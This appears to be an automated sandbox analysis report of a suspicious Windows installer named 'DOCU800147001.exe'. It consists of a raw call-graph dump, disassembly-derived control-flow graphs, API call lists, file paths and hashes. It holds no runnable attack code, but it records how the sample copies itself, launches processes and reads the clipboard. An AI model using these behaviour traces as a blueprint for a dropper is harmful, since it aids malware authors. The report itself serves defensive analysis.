401d9c CreateFontIndirectA 3972->3973 3974 4024cd 3973->3974 3975 4042a6 3976 4042d2 3975->3976 3977 4042e3 3975->3977 4036 405372 GetDlgItemTextA 3976->4036 3979 4042ef GetDlgItem 3977->3979 3984 40434e 3977->3984 3981 404303 3979->3981 3980 4042dd 3983 405de5 5 API calls 3980->3983 3986 404317 SetWindowTextA 3981->3986 3991 4056a3 4 API calls 3981->3991 3982 404432 4034 4045cd 3982->4034 4038 405372 GetDlgItemTextA 3982->4038 3983->3977 3984->3982 3987 405b9c 18 API calls 3984->3987 3984->4034 3989 403e68 19 API calls 3986->3989 3992 4043c2 SHBrowseForFolderA 3987->3992 3988 404462 3993 4056f8 18 API calls 3988->3993 3994 404333 3989->3994 3990 403ecf 8 API calls 3995 4045e1 3990->3995 3996 40430d 3991->3996 3992->3982 3997 4043da CoTaskMemFree 3992->3997 3998 404468 3993->3998 3999 403e68 19 API calls 3994->3999 3996->3986 4002 40560a 3 API calls 3996->4002 4000 40560a 3 API calls 3997->4000 4039 405b7a lstrcpynA 3998->4039 4001 404341 3999->4001 4003 4043e7 4000->4003 4037 403e9d SendMessageA 4001->4037 4002->3986 4006 40441e SetDlgItemTextA 4003->4006 4011 405b9c 18 API calls 4003->4011 4006->3982 4007 404347 4009 405ea5 3 API calls 4007->4009 4008 40447f 4010 405ea5 3 API calls 4008->4010 4009->3984 4019 404487 4010->4019 4012 404406 lstrcmpiA 4011->4012 4012->4006 4015 404417 lstrcatA 4012->4015 4013 4044c1 4040 405b7a lstrcpynA 4013->4040 4015->4006 4016 4044c8 4017 4056a3 4 API calls 4016->4017 4018 4044ce GetDiskFreeSpaceA 4017->4018 4022 4044f0 MulDiv 4018->4022 4023 404512 4018->4023 4019->4013 4021 405651 2 API calls 4019->4021 4019->4023 4021->4019 4022->4023 4024 40457c 4023->4024 4025 40464e 21 API calls 4023->4025 4026 40459f 4024->4026 4028 40140b 2 API calls 4024->4028 4027 40456e 4025->4027 4041 403e8a KiUserCallbackDispatcher 4026->4041 4030 404573 4027->4030 4031 40457e SetDlgItemTextA 4027->4031 4028->4026 4033 40464e 21 API calls 4030->4033 4031->4024 4032 4045bb 4032->4034 4042 40423b 4032->4042 4033->4024 4034->3990 4036->3980 4037->4007 4038->3988 4039->4008 4040->4016 4041->4032 4043 404249 4042->4043 4044 40424e SendMessageA 4042->4044 4043->4044 4044->4034 3462 40172c 3463 4029ff 18 API calls 3462->3463 3464 401733 3463->3464 3465 40583a 2 API calls 3464->3465 3466 40173a 3465->3466 3467 40583a 2 API calls 3466->3467 3467->3466 3468 401dac 3476 4029e2 3468->3476 3470 401db2 3471 4029e2 18 API calls 3470->3471 3472 401dbb 3471->3472 3473 401dc2 ShowWindow 3472->3473 3474 401dcd EnableWindow 3472->3474 3475 402894 3473->3475 3474->3475 3477 405b9c 18 API calls 3476->3477 3478 4029f6 3477->3478 3478->3470 4045 401eac 4046 4029ff 18 API calls 4045->4046 4047 401eb3 4046->4047 4048 405e7e 2 API calls 4047->4048 4049 401eb9 4048->4049 4051 401ecb 4049->4051 4052 405ad8 wsprintfA 4049->4052 4052->4051 4053 40192d 4054 4029ff 18 API calls 4053->4054 4055 401934 lstrlenA 4054->4055 4056 4024cd 4055->4056 4057 401cb0 4058 4029e2 18 API calls 4057->4058 4059 401cc0 SetWindowLongA 4058->4059 4060 402894 4059->4060 4061 401a31 4062 4029e2 18 API calls 4061->4062 4063 401a37 4062->4063 4064 4029e2 18 API calls 4063->4064 4065 4019e1 4064->4065 4066 4024b1 4067 4029ff 18 API calls 4066->4067 4068 4024b8 4067->4068 4071 40580b GetFileAttributesA CreateFileA 4068->4071 4070 4024c4 4071->4070 4072 403fb1 4073 4040d3 4072->4073 4074 403fc7 4072->4074 4075 404142 4073->4075 4077 404216 4073->4077 4084 404117 GetDlgItem SendMessageA 4073->4084 4076 403e68 19 API calls 4074->4076 4075->4077 4078 40414c GetDlgItem 4075->4078 4079 40401d 4076->4079 4081 403ecf 8 API calls 4077->4081 4082 404162 4078->4082 4083 4041d4 4078->4083 4080 403e68 19 API calls 4079->4080 4086 40402a CheckDlgButton 4080->4086 4087 404211 4081->4087 4082->4083 4088 404188 6 API calls 4082->4088 4083->4077 4089 4041e6 4083->4089 4103 403e8a KiUserCallbackDispatcher 4084->4103 4101 403e8a KiUserCallbackDispatcher 4086->4101 4088->4083 4092 4041ec SendMessageA 4089->4092 4093 4041fd 4089->4093 4090 40413d 4094 40423b SendMessageA 4090->4094 4092->4093 4093->4087 4096 404203 SendMessageA 4093->4096 4094->4075 4095 404048 GetDlgItem 4102 403e9d SendMessageA 4095->4102 4096->4087 4098 40405e SendMessageA 4099 404085 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4098->4099 4100 40407c GetSysColor 4098->4100 4099->4087 4100->4099 4101->4095 4102->4098 4103->4090 2856 401e32 2857 4029ff 18 API calls 2856->2857 2858 401e38 2857->2858 2872 404e65 2858->2872 2862 401e9e CloseHandle 2864 402665 2862->2864 2863 401e67 WaitForSingleObject 2865 401e48 2863->2865 2866 401e75 GetExitCodeProcess 2863->2866 2865->2862 2865->2863 2865->2864 2886 405ede 2865->2886 2868 401e92 2866->2868 2869 401e87 2866->2869 2868->2862 2870 401e90 2868->2870 2890 405ad8 wsprintfA 2869->2890 2870->2862 2873 404e80 2872->2873 2881 401e42 2872->2881 2874 404e9d lstrlenA 2873->2874 2875 405b9c 18 API calls 2873->2875 2876 404ec6 2874->2876 2877 404eab lstrlenA 2874->2877 2875->2874 2879 404ed9 2876->2879 2880 404ecc SetWindowTextA 2876->2880 2878 404ebd lstrcatA 2877->2878 2877->2881 2878->2876 2879->2881 2882 404edf SendMessageA SendMessageA SendMessageA 2879->2882 2880->2879 2883 40532d CreateProcessA 2881->2883 2882->2881 2884 405368 2883->2884 2885 40535c CloseHandle 2883->2885 2884->2865 2885->2884 2887 405efb PeekMessageA 2886->2887 2888 405ef1 DispatchMessageA 2887->2888 2889 405f0b 2887->2889 2888->2887 2889->2863 2890->2870 2973 4015b3 2974 4029ff 18 API calls 2973->2974 2975 4015ba 2974->2975 2991 4056a3 CharNextA CharNextA 2975->2991 2977 40160a 2978 401638 2977->2978 2979 40160f 2977->2979 2983 401423 25 API calls 2978->2983 2997 401423 2979->2997 2980 405635 CharNextA 2982 4015d0 CreateDirectoryA 2980->2982 2985 4015c2 2982->2985 2986 4015e5 GetLastError 2982->2986 2990 401630 2983->2990 2985->2977 2985->2980 2986->2985 2987 4015f2 GetFileAttributesA 2986->2987 2987->2985 2989 401621 SetCurrentDirectoryA 2989->2990 2992 4056be 2991->2992 2994 4056ce 2991->2994 2992->2994 2995 4056c9 CharNextA 2992->2995 2993 4056ee 2993->2985 2994->2993 2996 405635 CharNextA 2994->2996 2995->2993 2996->2994 2998 404e65 25 API calls 2997->2998 2999 401431 2998->2999 3000 405b7a lstrcpynA 2999->3000 3000->2989 4104 402036 4105 4029ff 18 API calls 4104->4105 4106 40203d 4105->4106 4107 4029ff 18 API calls 4106->4107 4108 402047 4107->4108 4109 4029ff 18 API calls 4108->4109 4110 402051 4109->4110 4111 4029ff 18 API calls 4110->4111 4112 40205b 4111->4112 4113 4029ff 18 API calls 4112->4113 4114 402065 4113->4114 4115 40207b CoCreateInstance 4114->4115 4116 4029ff 18 API calls 4114->4116 4119 40209a 4115->4119 4121 40214f 4115->4121 4116->4115 4117 401423 25 API calls 4118 402183 4117->4118 4120 402131 MultiByteToWideChar 4119->4120 4119->4121 4120->4121 4121->4117 4121->4118 4122 4014b7 4123 4014bd 4122->4123 4124 401389 2 API calls 4123->4124 4125 4014c5 4124->4125 4126 401bb8 4127 4029e2 18 API calls 4126->4127 4128 401bbf 4127->4128 4129 4029e2 18 API calls 4128->4129 4130 401bc9 4129->4130 4131 401bd9 4130->4131 4132 4029ff 18 API calls 4130->4132 4133 401be9 4131->4133 4136 4029ff 18 API calls 4131->4136 4132->4131 4134 401bf4 4133->4134 4135 401c38 4133->4135 4137 4029e2 18 API calls 4134->4137 4138 4029ff 18 API calls 4135->4138 4136->4133 4139 401bf9 4137->4139 4140 401c3d 4138->4140 4141 4029e2 18 API calls 4139->4141 4142 4029ff 18 API calls 4140->4142 4143 401c02 4141->4143 4144 401c46 FindWindowExA 4142->4144 4145 401c28 SendMessageA 4143->4145 4146 401c0a SendMessageTimeoutA 4143->4146 4147 401c64 4144->4147 4145->4147 4146->4147 4148 40243c 4149 402b09 19 API calls 4148->4149 4150 402446 4149->4150 4151 4029e2 18 API calls 4150->4151 4152 40244f 4151->4152 4153 402472 RegEnumValueA 4152->4153 4154 402466 RegEnumKeyA 4152->4154 4156 402665 4152->4156 4155 40248b RegCloseKey 4153->4155 4153->4156 4154->4155 4155->4156 4158 40223d 4159 40224b 4158->4159 4160 402245 4158->4160 4162 40225b 4159->4162 4163 4029ff 18 API calls 4159->4163 4161 4029ff 18 API calls 4160->4161 4161->4159 4164 402269 4162->4164 4166 4029ff 18 API calls 4162->4166 4163->4162 4165 4029ff 18 API calls 4164->4165 4167 402272 WritePrivateProfileStringA 4165->4167 4166->4164 3496 40173f 3497 4029ff 18 API calls 3496->3497 3498 401746 3497->3498 3499 401764 3498->3499 3500 40176c 3498->3500 3535 405b7a lstrcpynA 3499->3535 3536 405b7a lstrcpynA 3500->3536 3503 40176a 3506 405de5 5 API calls 3503->3506 3504 401777 3505 40560a 3 API calls 3504->3505 3507 40177d lstrcatA 3505->3507 3513 401789 3506->3513 3507->3503 3508 405e7e 2 API calls 3508->3513 3509 4057e6 2 API calls 3509->3513 3511 4017a0 CompareFileTime 3511->3513 3512 401864 3514 404e65 25 API calls 3512->3514 3513->3508 3513->3509 3513->3511 3513->3512 3515 405b7a lstrcpynA 3513->3515 3522 405b9c 18 API calls 3513->3522 3530 40538e MessageBoxIndirectA 3513->3530 3532 40183b 3513->3532 3534 40580b GetFileAttributesA CreateFileA 3513->3534 3516 40186e 3514->3516 3515->3513 3519 402e64 33 API calls 3516->3519 3517 404e65 25 API calls 3518 401850 3517->3518 3520 401881 3519->3520 3521 401895 SetFileTime 3520->3521 3523 4018a7 CloseHandle 3520->3523 3521->3523 3522->3513 3523->3518 3524 4018b8 3523->3524 3525 4018d0 3524->3525 3526 4018bd 3524->3526 3527 405b9c 18 API calls 3525->3527 3528 405b9c 18 API calls 3526->3528 3529 4018d8 3527->3529 3531 4018c5 lstrcatA 3528->3531 3533 40538e MessageBoxIndirectA 3529->3533 3530->3513 3531->3529 3532->3517 3532->3518 3533->3518 3534->3513 3535->3503 3536->3504 4168 40163f 4169 4029ff 18 API calls 4168->4169 4170 401645 4169->4170 4171 405e7e 2 API calls 4170->4171 4172 40164b 4171->4172 4173 40193f 4174 4029e2 18 API calls 4173->4174 4175 401946 4174->4175 4176 4029e2 18 API calls 4175->4176 4177 401950 4176->4177 4178 4029ff 18 API calls 4177->4178 4179 401959 4178->4179 4180 40196c lstrlenA 4179->4180 4182 4019a7 4179->4182 4181 401976 4180->4181 4181->4182 4186 405b7a lstrcpynA 4181->4186 4184 401990 4184->4182 4185 40199d lstrlenA 4184->4185 4185->4182 4186->4184

                                                Executed Functions

                                                Function 004030CB Relevance: 79.1, APIs: 27, Strings: 18, Instructions: 324stringfilecomCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 4030cb-403162 #17 SetErrorMode OleInitialize call 405ea5 SHGetFileInfoA call 405b7a GetCommandLineA call 405b7a GetModuleHandleA 7 403164-403169 0->7 8 40316e-403183 call 405635 CharNextA 0->8 7->8 11 403248-40324c 8->11 12 403252 11->12 13 403188-40318b 11->13 16 403265-40327f GetTempPathA call 403097 12->16 14 403193-40319b 13->14 15 40318d-403191 13->15 17 4031a3-4031a6 14->17 18 40319d-40319e 14->18 15->14 15->15 26 403281-40329f GetWindowsDirectoryA lstrcatA call 403097 16->26 27 4032d7-4032f1 DeleteFileA call 402c2b 16->27 20 403238-403245 call 405635 17->20 21 4031ac-4031b0 17->21 18->17 20->11 36 403247 20->36 24 4031b2-4031b8 21->24 25 4031c8-4031f5 21->25 30 4031ba-4031bc 24->30 31 4031be 24->31 32 4031f7-4031fd 25->32 33 403208-403236 25->33 26->27 44 4032a1-4032d1 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403097 26->44 41 403385-403394 call 403529 OleUninitialize 27->41 42 4032f7-4032fd 27->42 30->25 30->31 31->25 38 403203 32->38 39 4031ff-403201 32->39 33->20 35 403254-403260 call 405b7a 33->35 35->16 36->11 38->33 39->33 39->38 55 40339a-4033aa call 40538e ExitProcess 41->55 56 40348e-403494 41->56 46 403375-40337c call 403603 42->46 47 4032ff-40330a call 405635 42->47 44->27 44->41 53 403381 46->53 59 403340-40334a 47->59 60 40330c-403335 47->60 53->41 57 403511-403519 56->57 58 403496-4034b3 call 405ea5 * 3 56->58 63 40351b 57->63 64 40351f-403523 ExitProcess 57->64 89 4034b5-4034b7 58->89 90 4034fd-403508 ExitWindowsEx 58->90 66 4033b0-4033ca lstrcatA lstrcmpiA 59->66 67 40334c-403359 call 4056f8 59->67 65 403337-403339 60->65 63->64 65->59 70 40333b-40333e 65->70 66->41 72 4033cc-4033e1 CreateDirectoryA SetCurrentDirectoryA 66->72 67->41 77 40335b-403371 call 405b7a * 2 67->77 70->59 70->65 73 4033e3-4033e9 call 405b7a 72->73 74 4033ee-403416 call 405b7a 72->74 73->74 85 40341c-403438 call 405b9c DeleteFileA 74->85 77->46 95 403479-403480 85->95 96 40343a-40344a CopyFileA 85->96 89->90 94 4034b9-4034bb 89->94 90->57 93 40350a-40350c call 40140b 90->93 93->57 94->90 98 4034bd-4034cf GetCurrentProcess 94->98 95->85 99 403482-403489 call 405a2e 95->99 96->95 100 40344c-40346c call 405a2e call 405b9c call 40532d 96->100 98->90 104 4034d1-4034f3 98->104 99->41 100->95 112 40346e-403475 CloseHandle 100->112 104->90 112->95
                                                APIs
                                                • #17.COMCTL32 ref: 004030EC
                                                • SetErrorMode.KERNELBASE(00008001), ref: 004030F7
                                                • OleInitialize.OLE32(00000000), ref: 004030FE
                                                  • Part of subcall function 00405EA5: GetModuleHandleA.KERNEL32(?,?,?,00403110,00000008), ref: 00405EB7
                                                  • Part of subcall function 00405EA5: LoadLibraryA.KERNELBASE(?,?,?,00403110,00000008), ref: 00405EC2
                                                  • Part of subcall function 00405EA5: GetProcAddress.KERNEL32(00000000,?), ref: 00405ED3
                                                • SHGetFileInfoA.SHELL32(0079D4B8,00000000,?,00000160,00000000,00000008), ref: 00403126
                                                  • Part of subcall function 00405B7A: lstrcpynA.KERNEL32(?,?,00000400,0040313B,Pantaloons Setup,NSIS Error), ref: 00405B87
                                                • GetCommandLineA.KERNEL32(Pantaloons Setup,NSIS Error), ref: 0040313B
                                                • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\DOCU800147001.exe",00000000), ref: 0040314E
                                                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\DOCU800147001.exe",00000020), ref: 00403179
                                                • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403276
                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403287
                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403293
                                                • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032A7
                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004032AF
                                                • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004032C0
                                                • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004032C8
                                                • DeleteFileA.KERNELBASE(1033), ref: 004032DC
                                                • OleUninitialize.OLE32(?), ref: 0040338A
                                                • ExitProcess.KERNEL32 ref: 004033AA
                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\DOCU800147001.exe",00000000,?), ref: 004033B6
                                                • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 004033C2
                                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004033CE
                                                • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004033D5
                                                • DeleteFileA.KERNEL32(0079D0B8,0079D0B8,?,error,?), ref: 0040342E
                                                • CopyFileA.KERNEL32(C:\Users\user\Desktop\DOCU800147001.exe,0079D0B8,00000001), ref: 00403442
                                                • CloseHandle.KERNEL32(00000000,0079D0B8,0079D0B8,?,0079D0B8,00000000), ref: 0040346F
                                                • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004034C4
                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403500
                                                • ExitProcess.KERNEL32 ref: 00403523
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                • String ID: "$"C:\Users\user\Desktop\DOCU800147001.exe"$1033$C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne$C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kulds$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DOCU800147001.exe$Error launching installer$Low$NSIS Error$Pantaloons Setup$SeShutdownPrivilege$TEMP$TMP$\Temp$error$~nsu.tmp
                                                • API String ID: 4107622049-1683664228
                                                • Opcode ID: bca945fe0b75715696cad3be9775b158e3384de67f76d366391c2df84a45dd97
                                                • Instruction ID: 928bf8b7717c50f7cf81e46c7c3b8c2b1ab21f80cc33b5d8a4cab443c6c74aa6
                                                • Opcode Fuzzy Hash: bca945fe0b75715696cad3be9775b158e3384de67f76d366391c2df84a45dd97
                                                • Instruction Fuzzy Hash: D0B106705083816EE7216F745C8DA2F3EA8AB86306F04057EF581B61E2C77C9A058B6E
                                                Function 00404FA3 Relevance: 54.3, APIs: 36, Instructions: 280windowclipboardmemoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 216 404fa3-404fbf 217 405150-405156 216->217 218 404fc5-40508e GetDlgItem * 3 call 403e9d call 404703 GetClientRect GetSystemMetrics SendMessageA * 2 216->218 220 405180-40518c 217->220 221 405158-40517a GetDlgItem CreateThread CloseHandle 217->221 240 405090-4050aa SendMessageA * 2 218->240 241 4050ac-4050af 218->241 223 4051ae-4051b4 220->223 224 40518e-405194 220->224 221->220 225 4051b6-4051bc 223->225 226 405209-40520c 223->226 228 405196-4051a9 ShowWindow * 2 call 403e9d 224->228 229 4051cf-4051d6 call 403ecf 224->229 230 4051e2-4051f2 ShowWindow 225->230 231 4051be-4051ca call 403e41 225->231 226->229 234 40520e-405214 226->234 228->223 237 4051db-4051df 229->237 238 405202-405204 call 403e41 230->238 239 4051f4-4051fd call 404e65 230->239 231->229 234->229 242 405216-405229 SendMessageA 234->242 238->226 239->238 240->241 245 4050b1-4050bd SendMessageA 241->245 246 4050bf-4050d6 call 403e68 241->246 247 405326-405328 242->247 248 40522f-40525b CreatePopupMenu call 405b9c AppendMenuA 242->248 245->246 255 4050d8-4050ec ShowWindow 246->255 256 40510c-40512d GetDlgItem SendMessageA 246->256 247->237 253 405270-405286 TrackPopupMenu 248->253 254 40525d-40526d GetWindowRect 248->254 253->247 257 40528c-4052a6 253->257 254->253 258 4050fb 255->258 259 4050ee-4050f9 ShowWindow 255->259 256->247 260 405133-40514b SendMessageA * 2 256->260 261 4052ab-4052c6 SendMessageA 257->261 262 405101-405107 call 403e9d 258->262 259->262 260->247 261->261 263 4052c8-4052e8 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 261->263 262->256 265 4052ea-40530a SendMessageA 263->265 265->265 266 40530c-405320 GlobalUnlock SetClipboardData CloseClipboard 265->266 266->247
                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 00405003
                                                • GetDlgItem.USER32(?,000003EE), ref: 00405012
                                                • GetClientRect.USER32(?,?), ref: 0040504F
                                                • GetSystemMetrics.USER32(00000015), ref: 00405057
                                                • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405078
                                                • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405089
                                                • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040509C
                                                • SendMessageA.USER32(?,00001026,00000000,?), ref: 004050AA
                                                • SendMessageA.USER32(?,00001024,00000000,?), ref: 004050BD
                                                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004050DF
                                                • ShowWindow.USER32(?,00000008), ref: 004050F3
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405114
                                                • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405124
                                                • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040513D
                                                • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405149
                                                • GetDlgItem.USER32(?,000003F8), ref: 00405021
                                                  • Part of subcall function 00403E9D: SendMessageA.USER32(00000028,?,00000001,00403CCE), ref: 00403EAB
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405165
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00004F37,00000000), ref: 00405173
                                                • CloseHandle.KERNELBASE(00000000), ref: 0040517A
                                                • ShowWindow.USER32(00000000), ref: 0040519D
                                                • ShowWindow.USER32(?,00000008), ref: 004051A4
                                                • ShowWindow.USER32(00000008), ref: 004051EA
                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040521E
                                                • CreatePopupMenu.USER32 ref: 0040522F
                                                • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405244
                                                • GetWindowRect.USER32(?,000000FF), ref: 00405264
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040527D
                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052B9
                                                • OpenClipboard.USER32(00000000), ref: 004052C9
                                                • EmptyClipboard.USER32 ref: 004052CF
                                                • GlobalAlloc.KERNEL32(00000042,?), ref: 004052D8
                                                • GlobalLock.KERNEL32(00000000), ref: 004052E2
                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052F6
                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040530F
                                                • SetClipboardData.USER32(00000001,00000000), ref: 0040531A
                                                • CloseClipboard.USER32 ref: 00405320
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                • String ID:
                                                • API String ID: 590372296-0
                                                • Opcode ID: 67fad66c93797b1957110bcf73ca91ee41e40ea5419954ffc4f166d8cbeaff82
                                                • Instruction ID: d5812118e63f16fa5c19f57adc5cd4d6a9be73a85bc34068d170a9efe70f60b8
                                                • Opcode Fuzzy Hash: 67fad66c93797b1957110bcf73ca91ee41e40ea5419954ffc4f166d8cbeaff82
                                                • Instruction Fuzzy Hash: 84A16B70900208FFEB119FA4DD89AAE7F79FB48344F00416AFA01B61A0C7795E50DFA9
                                                Function 00405B9C Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 199stringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 405 405b9c-405ba7 406 405ba9-405bb8 405->406 407 405bba-405bcf 405->407 406->407 408 405dc2-405dc6 407->408 409 405bd5-405be0 407->409 411 405bf2-405bfc 408->411 412 405dcc-405dd6 408->412 409->408 410 405be6-405bed 409->410 410->408 411->412 413 405c02-405c09 411->413 414 405de1-405de2 412->414 415 405dd8-405ddc call 405b7a 412->415 417 405db5 413->417 418 405c0f-405c44 413->418 415->414 419 405db7-405dbd 417->419 420 405dbf-405dc1 417->420 421 405c4a-405c55 GetVersion 418->421 422 405d5f-405d62 418->422 419->408 420->408 423 405c57-405c5b 421->423 424 405c6f 421->424 425 405d92-405d95 422->425 426 405d64-405d67 422->426 423->424 430 405c5d-405c61 423->430 427 405c76-405c7d 424->427 428 405da3-405db3 lstrlenA 425->428 429 405d97-405d9e call 405b9c 425->429 431 405d77-405d83 call 405b7a 426->431 432 405d69-405d75 call 405ad8 426->432 434 405c82-405c84 427->434 435 405c7f-405c81 427->435 428->408 429->428 430->424 438 405c63-405c67 430->438 442 405d88-405d8e 431->442 432->442 440 405c86-405ca9 call 405a61 434->440 441 405cbd-405cc0 434->441 435->434 438->424 443 405c69-405c6d 438->443 453 405d46-405d4a 440->453 454 405caf-405cb8 call 405b9c 440->454 446 405cd0-405cd3 441->446 447 405cc2-405cce GetSystemDirectoryA 441->447 442->428 445 405d90 442->445 443->427 449 405d57-405d5d call 405de5 445->449 451 405cd5-405ce3 GetWindowsDirectoryA 446->451 452 405d3d-405d3f 446->452 450 405d41-405d44 447->450 449->428 450->449 450->453 451->452 452->450 455 405ce5-405cef 452->455 453->449 458 405d4c-405d52 lstrcatA 453->458 454->450 460 405cf1-405cf4 455->460 461 405d09-405d1f SHGetSpecialFolderLocation 455->461 458->449 460->461 462 405cf6-405cfd 460->462 463 405d21-405d38 SHGetPathFromIDListA CoTaskMemFree 461->463 464 405d3a 461->464 466 405d05-405d07 462->466 463->450 463->464 464->452 466->450 466->461
                                                APIs
                                                • GetVersion.KERNEL32(00000000,Completed,00000000,00404E9D,Completed,00000000), ref: 00405C4D
                                                • GetSystemDirectoryA.KERNEL32(: Completed,00000400), ref: 00405CC8
                                                • GetWindowsDirectoryA.KERNEL32(: Completed,00000400), ref: 00405CDB
                                                • SHGetSpecialFolderLocation.SHELL32(?,0078EAA8), ref: 00405D17
                                                • SHGetPathFromIDListA.SHELL32(0078EAA8,: Completed), ref: 00405D25
                                                • CoTaskMemFree.OLE32(0078EAA8), ref: 00405D30
                                                • lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D52
                                                • lstrlenA.KERNEL32(: Completed,00000000,Completed,00000000,00404E9D,Completed,00000000), ref: 00405DA4
                                                Strings
                                                Memory Dump Source
